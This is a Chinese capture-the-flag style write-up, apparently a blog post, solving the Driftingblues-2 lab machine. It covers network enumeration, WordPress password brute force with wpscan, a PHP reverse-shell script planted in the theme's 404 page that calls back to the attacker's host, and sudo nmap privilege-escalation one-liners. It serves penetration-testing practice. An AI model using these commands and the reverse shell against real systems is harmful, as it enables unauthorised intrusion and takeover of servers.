IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> Hackmyvm综合靶机 | Driftingblues-2 -> 正文阅读

[系统运维]Hackmyvm综合靶机 | Driftingblues-2

前言提要

今天在打靶机的时候遇见了一个新问题:Vulnhub靶机检测不到IP地址!!!!其原因也许是因为网卡服务启动失败。

所以这里也教一下大家当靶机探测不到IP地址的时候如何对靶机进行相关配置修改,也方便后续我再次遇见这种问题的时候知道如何操作

解决步骤

因为靶机我们是不知道账号密码的,所以只能通过拯救模式进行操作

  • 在开机时按下Shift键进入界面,再按e键,进入以下界面

image-20220402165037248

  • 将ro 替换为 rw signie init=/bin/bash

  • 同时按下Ctrl+X键,进入以下页面

  • 查看当前网卡信息 ip a

image-20220402165351124

  • 编辑网卡配置文件 vim /etc/network/interfaces,将靶机的网卡配置文件修改成上一步查看的对应网卡名称

image-20220402165331673

  • 保存,瑞出,重启网卡服务 /etc/init .d/networking restart
  • 查看IP状态,成功获取IP地址

信息收集

确定目标IP:192.168.132.160

nmap -A -sV -p- -T4 192.168.132.160

image-20220402165617502

自打靶机以来,第一次见FTP端口呢!!!

根据扫描结果,开放了21、22、80端口

21FTP端口探测

根据扫描信息知道,允许匿名登录

用户名:anontmous

密码:(空)

Ftp 192.168.132.160
ls
get secret.jpg
exit

里面也没什么东西倒是发现一张密码图片,将它下载下来

退出FTP

怀疑图片存在隐写

但是什么都没有

binwalk secret.jpg

image-20220402170057613

80端口

老规矩访问80端口的web页面

网页全是图片,源代码也没有隐藏东西

目录FUZZ尝试一波

dirb http://192.168.132.160

image-20220402170255332

发现一个blog页面,打开链接里面全是博客,并且发现该CMS是WordpPress

image-20220402170435333

随便点击进去一篇,IP转域名且无法访问

根据前面打DC靶机的经验,要修改hosts文件

vim /etc/hosts

再次隐藏目录FUZZ,发现后台登陆地址

使用wpscan进行账号密码爆破

wpscan --url http://driftingblues.box/blog -e u  

发现了登入账号:albert

爆破密码

wpscan --url http://driftingblues.box/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

image-20220402170914246

爆破成功,进入后台

404页面反弹shell

全面浏览后台,找到反弹SHEELL的地方

image-20220402172104072

这是php反弹shell脚本

$ip="192.168.132.139";
$port=3333;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

在kali监听shell

是在404页面写入,访问一个不存在的页面使得反弹shell执行

例如:http://driftingblues.box/blog/index.php/123

image-20220402172624792

成功并升级为交互式shell

在home下发现用户freddie,进入freddie发现一个user.txt但是无权限访问

ls -al

image-20220402172848112

22端口SSH

发现一个ssh登陆的rsa

把里面的密钥负责到我们本地的新建文件:id_rsa,然后进行登陆

image-20220402173720974

chmod 400 id_rsa
ssh freddie@192.168.33.140 -i id_rsa
sudo -l

image-20220402173822452

Nmap提权

image-20220402173858949

前面打DC靶机的时候在DC-6靶机提权使用的也是nmap提权

直接照搬命令

确定就是脚本命令执行后看不见自己输入的命令

# nmap提权:以root的权限用nmap执行这个脚本
echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

image-20220402174138065

第二种nmap提权

image-20220402174243897

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

然后使用 python 切换 bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
或者直接输入bash

image-20220402174331918

知识总结

总体来说这也是一个简单的靶机,操作步骤大概为

  • 信息收集
  • 21FTP端口探测(最终也没探测出来什么东西,那个图片也没有隐藏信息,不过给了第一次接触FTP的机会)
  • 80端口探测,常规隐藏目录扫描,后台登陆账号密码爆破(CMS是Word press就想着使用wpscan),接着后台全面浏览发现可以反弹shell的地方
  • 反弹shell接收,进行目录和文件浏览在home下发现用户再进入到用户中探测
  • 22SSH端口探测,因为是RSA所以权限是400(chmod 400)
  • nmap提权(回顾DC-6的提权)

完结!!!每次打靶机都会收获新知识!!!!

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-04-07 23:07:00  更:2022-04-07 23:11:01 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 23:02:18-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码